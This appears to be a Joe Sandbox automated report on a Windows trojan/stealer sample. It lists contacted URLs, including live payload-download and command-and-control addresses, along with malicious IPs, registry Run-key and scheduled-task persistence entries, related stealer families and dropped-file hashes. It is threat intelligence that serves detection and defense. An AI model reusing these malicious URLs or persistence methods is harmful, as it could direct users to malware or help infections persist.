http://www.carterandcone.coml	qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/off/random.exek	skotes.exe, 0000000C.00000002.2952843084.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.fontbureau.com/designers/frere-user.html	qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://31.41.244.11/files/5131681669/KeaEfrP.ps1RN###	skotes.exe, 0000000C.00000002.2952843084.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.micro	60c1233683.exe, 00000022.00000002.2958937922.0000000000D23000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.phpC	50c9f14fb7.exe, 00000023.00000002.2876580011.00000000010D8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.microsof	60c1233683.exe, 00000022.00000003.2728503436.0000000005603000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000001C.00000002.2777328250.0000000004E26000.00000004.00000800.00020000.00000000.sdmp	false		high
http://woo097878781.win	powershell.exe, 0000001C.00000002.2777328250.00000000052DD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.206/68b591d6548ec281/mozglue.dll~	file.exe, 00000000.00000002.2114430584.00000000017C7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.16/off/random.exec6~	skotes.exe, 0000000C.00000002.2952843084.0000000000609000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/c4becf79229cb002.phpO	50c9f14fb7.exe, 00000023.00000002.2876580011.00000000010D8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	60c1233683.exe, 00000022.00000003.2728640685.00000000055D5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/	60c1233683.exe, 00000022.00000003.2753152898.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000002.2963578166.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000002.2958937922.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2874831916.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2904209144.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2728825814.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	file.exe, 00000000.00000003.1999428433.000000000C326000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.phpmRoot=C:	file.exe, 00000000.00000002.2121699779.000000000BFAA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.fontbureau.com/designersG	qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/?	qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/QQ	60c1233683.exe, 00000022.00000003.2847457804.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2847599444.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2848077723.0000000000DAD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.founder.com.cn/cn/bThe	qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	callmobile.exe, 0000001B.00000002.3358250427.0000000005C40000.00000004.08000000.00040000.00000000.sdmp, callmobile.exe, 0000001B.00000002.3325178734.0000000004178000.00000004.00000800.00020000.00000000.sdmp	false		high
https://woo097878781.win/64.EXEhttps://woo097878781.win/upload.php66Mozilla/5.0	downloaded_file.exe, 00000024.00000003.2763632421.0000000001275000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.phpe	file.exe, 00000000.00000002.2114430584.00000000017C7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 0000001C.00000002.2807680074.0000000005D38000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/well/random.exev	skotes.exe, 0000000C.00000002.2952843084.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.tiro.com	qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.1872147865.000000000184B000.00000004.00000020.00020000.00000000.sdmp, qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.2977391726.00000000129F0000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2723362771.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2724311923.00000000055EC000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2728108158.00000000055EC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	file.exe, 00000000.00000002.2113309307.0000000000B74000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1860911185.0000000005E5D000.00000004.00000020.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2753720276.00000000055FA000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2752316946.00000000055FA000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2728503436.0000000005601000.00000004.00000800.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2728640685.00000000055FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, 0000001E.00000002.3130346243.000000001E9A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://31.41.244.11/files/5131681669/KeaEfrP.ps1	skotes.exe, 0000000C.00000002.2952843084.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.16/luma/random.exe	skotes.exe, 0000000C.00000002.2952843084.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
5.188.137.200	unknown	Russian Federation	50340	SELECTEL-MSKRU	true
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
154.216.20.243	woo097878781.win	Seychelles	135357	SKHT-ASShenzhenKatherineHengTechnologyInformationCo	true
239.255.255.250	unknown	Reserved	unknown	unknown	false
216.58.208.228	www.google.com	United States	15169	GOOGLEUS	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
104.21.16.9	atten-supporse.biz	United States	13335	CLOUDFLARENETUS	false
185.157.162.216	unknown	Sweden	197595	OBE-EUROPEObenetworkEuropeSE	true
77.73.39.158	unknown	Poland	61251	HOST4BIZ-ASPL	true
31.41.244.11	unknown	Russian Federation	61974	AEROEXPRESS-ASRU	false

Private

IP
192.168.2.4
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1571039
Start date and time:	2024-12-08 19:51:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	62
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@105/125@27/13
EGA Information:	Successful, ratio: 75%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 172.217.19.227, 172.217.19.238, 64.233.162.84, 172.217.17.46, 172.217.21.35, 23.218.208.109, 142.250.181.138, 142.250.181.10, 142.250.181.42, 172.217.19.234, 142.250.181.106, 172.217.19.202, 172.217.17.42, 172.217.17.74, 172.217.21.42, 142.250.181.74, 199.232.214.172, 192.229.221.95
Excluded domains from analysis (whitelisted): example.org, prod.detectportal.prod.cloudops.mozgcp.net, slscr.update.microsoft.com, spocs.getpocket.com, incoming.telemetry.mozilla.org, clientservices.googleapis.com, aus5.mozilla.org, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, contile.services.mozilla.com, prod.content-signature-chains.prod.webservices.mozgcp.net, content-signature-2.cdn.mozilla.net, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, ipv4only.arpa, e16604.g.akamaiedge.net, firefox.settings.services.mozilla.com, push.services.mozilla.com, prod.ads.prod.webservices.mozgcp.net, safebrowsing.googleapis.com, www.gstatic.com, prod.fs.microsoft.com.akadns.net, prod.classify-client.prod.webservices.mozgcp.net, prod.balrog.prod.cloudops.mozgcp.net, shavar.prod.mozaws.net, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, detectportal.firefox.com, ctldl.windowsupdate.com, ogads-pa.googleapis.com, prod.remote-settings.prod.w
Execution Graph export aborted for target file.exe, PID 7396 because there are no executed function
HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
13:52:10	API Interceptor	2x Sleep call for process: svchost.exe modified
13:52:29	API Interceptor	79x Sleep call for process: file.exe modified
13:53:01	API Interceptor	1403x Sleep call for process: skotes.exe modified
13:53:31	API Interceptor	65x Sleep call for process: powershell.exe modified
13:53:35	API Interceptor	224x Sleep call for process: qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe modified
13:53:42	API Interceptor	8x Sleep call for process: 60c1233683.exe modified
13:53:57	API Interceptor	1x Sleep call for process: explorer.exe modified
13:53:58	API Interceptor	1x Sleep call for process: WindosCPUsystem.exe modified
13:54:00	API Interceptor	7x Sleep call for process: callmobile.exe modified
18:52:45	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
18:53:47	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 60c1233683.exe C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe
18:53:51	Task Scheduler	Run new task: WindowsSystem path: "C:\ProgramData\WindowsSystem\WindowsSystem.exe" s>{34E50511-FBB8-42F8-98A2-2629192A03A0}
18:53:56	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 50c9f14fb7.exe C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe
18:54:06	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 5e54822fbe.exe C:\Users\user\AppData\Local\Temp\1013251001\5e54822fbe.exe
18:54:17	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 60c1233683.exe C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe
18:54:28	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 50c9f14fb7.exe C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe
18:54:39	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 5e54822fbe.exe C:\Users\user\AppData\Local\Temp\1013251001\5e54822fbe.exe
18:54:49	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoRun_WindosCPUsystem.bat

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.43	file.exe	Get hash	malicious	Amadey, LummaC Stealer	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
5.188.137.200	nfkciRoR4j.exe	Get hash	malicious	Xmrig	Browse
185.215.113.16	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16/mine/random.exe
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16/off/random.exe
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16/mine/random.exe
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16/luma/random.exe
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.16/off/def.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
atten-supporse.biz	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	Amadey, LummaC Stealer	Browse	172.67.165.166
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	172.67.165.166
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	104.21.16.9
twitter.com	file.exe	Get hash	malicious	Credential Flusher	Browse	104.244.42.129
	file.exe	Get hash	malicious	Credential Flusher	Browse	104.244.42.193
	file.exe	Get hash	malicious	Credential Flusher	Browse	104.244.42.65
	file.exe	Get hash	malicious	Credential Flusher	Browse	104.244.42.129
	file.exe	Get hash	malicious	Credential Flusher	Browse	104.244.42.129
	file.exe	Get hash	malicious	Credential Flusher	Browse	104.244.42.65
	file.exe	Get hash	malicious	Credential Flusher	Browse	104.244.42.65
	file.exe	Get hash	malicious	Credential Flusher	Browse	104.244.42.1
	file.exe	Get hash	malicious	Credential Flusher	Browse	104.244.42.129
	file.exe	Get hash	malicious	Credential Flusher	Browse	104.244.42.193
star-mini.c10r.facebook.com	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.196.35
	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.195.35
	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.196.35
	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.196.35
	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.195.35
	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.195.35
	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.195.35
	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.196.35
	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.195.35
	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.196.35

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SELECTEL-MSKRU	nfkciRoR4j.exe	Get hash	malicious	Xmrig	Browse	5.188.137.200
	442.docx.exe	Get hash	malicious	RMSRemoteAdmin	Browse	95.213.205.83
	442.docx.exe	Get hash	malicious	RMSRemoteAdmin	Browse	95.213.205.83
	442.docx.exe	Get hash	malicious	RMSRemoteAdmin	Browse	95.213.205.83
	442.docx.exe	Get hash	malicious	RMSRemoteAdmin	Browse	95.213.205.83
	https://telegra.ph/yyrgrfwdfeg-10-25?4077	Get hash	malicious	Unknown	Browse	5.188.114.126
	https://petsworld.nl/trigger.php?r_link=https%3A%2F%2Ftelegra.ph%2Fyyrgrfwdfeg-10-25%3F4077	Get hash	malicious	Unknown	Browse	5.188.114.126
	nabarm5.elf	Get hash	malicious	Unknown	Browse	82.148.14.47
	na.elf	Get hash	malicious	Unknown	Browse	37.9.7.204
	https://redlinkbitse.top/go/3394z2/03a4.php	Get hash	malicious	Unknown	Browse	5.188.114.126
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, LummaC Stealer	Browse	185.215.113.43
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, LummaC Stealer	Browse	185.215.113.43
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	file.exe	Get hash	malicious	LummaC Stealer	Browse	20.109.210.53 13.107.246.63
	file.exe	Get hash	malicious	AveMaria, StormKitty, VenomRAT	Browse	20.109.210.53 13.107.246.63
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	20.109.210.53 13.107.246.63
	file.exe	Get hash	malicious	LummaC Stealer	Browse	20.109.210.53 13.107.246.63
	file.exe	Get hash	malicious	AveMaria, StormKitty, VenomRAT	Browse	20.109.210.53 13.107.246.63
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	20.109.210.53 13.107.246.63
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	20.109.210.53 13.107.246.63
	file.exe	Get hash	malicious	LummaC Stealer	Browse	20.109.210.53 13.107.246.63
	file.exe	Get hash	malicious	LummaC Stealer	Browse	20.109.210.53 13.107.246.63
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	20.109.210.53 13.107.246.63
3b5074b1b5d032e5620f69f9f700ff0e	S1a5ZF3ytp.vbs	Get hash	malicious	GuLoader	Browse	154.216.20.243
	file.exe	Get hash	malicious	Amadey, LummaC Stealer	Browse	154.216.20.243
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	154.216.20.243
	file.exe	Get hash	malicious	LummaC Stealer	Browse	154.216.20.243
	file.exe	Get hash	malicious	Quasar	Browse	154.216.20.243
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	154.216.20.243
	ugjigghFzZ.exe	Get hash	malicious	Quasar	Browse	154.216.20.243
	spoolsv.exe	Get hash	malicious	RedLine, StormKitty, XWorm	Browse	154.216.20.243
	2477.exe	Get hash	malicious	NoCry, RedLine, StormKitty, XWorm	Browse	154.216.20.243
	BA9qyj2c9G.exe	Get hash	malicious	WhiteSnake Stealer	Browse	154.216.20.243
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9 154.216.20.243
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9 154.216.20.243
	file.exe	Get hash	malicious	Amadey, LummaC Stealer	Browse	104.21.16.9 154.216.20.243
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9 154.216.20.243
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9 154.216.20.243
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.16.9 154.216.20.243
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9 154.216.20.243
	file.exe	Get hash	malicious	DarkVision Rat, Xmrig	Browse	104.21.16.9 154.216.20.243
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9 154.216.20.243
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.16.9 154.216.20.243
fb0aa01abe9d8e4037eb3473ca6e2dca	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.160.144.191 34.120.208.123

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	S1NrYNOYhZ.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse

Created / dropped Files

C:\Program Files (x86)\jDownloader\config\2ad47189800c09

Download File

Process:	C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe
File Type:	ASCII text, with very long lines (730), with no line terminators
Category:	dropped
Size (bytes):	730
Entropy (8bit):	5.892321404349132
Encrypted:	false
SSDEEP:	12:43ib/2uJXd4xUukmnqLSjrXtKrgLCGMjMQf59r0kKqsbOMrcDq:4yvdXukmwsj8jRf59r0kKqrDq
MD5:	BABAF9886FDFF22C698712CCF971FF29
SHA1:	A55F7BF1686F2887A1B8E25A049A383B89352294
SHA-256:	524BF4DAD917FD7701C42CCBBAEDF5A1374A79B12E121FDCB37ECDB3E744C497
SHA-512:	56FB3C2E7C39760B0514D63657A01626FCD32F22086A2D1A81770DE6FD07A87E5BC9291B9FC33491559311B483D5657C8F83213571A1D1B92FD892EE85CDF16C
Malicious:	false
Preview:	6zYL3N26Z5GjFMP4XXwE3WHzkRtdtgJtUNl0C3ZVg7fe33mPGXj0a4zksikmeYM3wXP2lY2e8ai50n6qpdXV6SSaXAIdSx1HulrfotorfF29V3uFm46BB16dEzfkQZLLjbKO5aC6yp01aSFdQC0Y0zF3pNbyOEaF3ra3tfJL1ANVAEDvuBTNiwVuVQjr9NsuOv7s2Luv2pgzmt3kKpEMuNgHWqhc5bMoSdHOHU3iQiU3PfHlX9hTJf9BO0WMnSzac2gJmodzwf5M2m10i5E632fxdFAQ8r58s3bX989sfshnjxJl8gnrN3gjXtpgoM1Ek7d8Le1j6WaLV1Nq6YRbDNvzX1APScDT1cDmTLaeoEv1cVOfg9kQ4ZBXMolUdlReSHT2ykWv7xw9b4XBmetS1xZcbpapkFADwRiVBWq6nzSHmB5SRjs828mer1aIJrL2wtMKVB9PyxpCeRzZuIYAXCKyoDnK5hw6oaV2zv6PkcKFSk9ZBBYATKeujXfRYzTQAtXE67k9MJa51FfEDNI4Jvmd5lTbPo0uI3EjM5dEaZyKuj2d2aNLqZHPG4IVoIthSpw7B62ItEeu6ctWszjzapEtwzdSxIaSpR1Fw4c5iFbl5XSnKvmyi4GnlDLLcjUloLEplnkxXnQVOcyZhzHBfltvLOestQd9uz7tSmChLya5ovZIPvomcTFCcSeWJ1DGKRkYeEG4xk0rKyHZzVd8l0hbt4

C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe

Download File

Process:	C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1709568
Entropy (8bit):	4.871474066048546
Encrypted:	false
SSDEEP:	24576:2YCGLO9L8YXprwCw7lTxvvNlm5hK+iYBKUOzXQAY671:3CGq9pXprWu/XhtA
MD5:	579FD24F4CACC972F63F47214F9C3C34
SHA1:	20BE9C6E9AA29D57B670D6809FFAD1786A8508E5
SHA-256:	F80BD8EB42194DF565E3152D35BAD6A40FDAE70E221E9E66873587BFFB73D64B
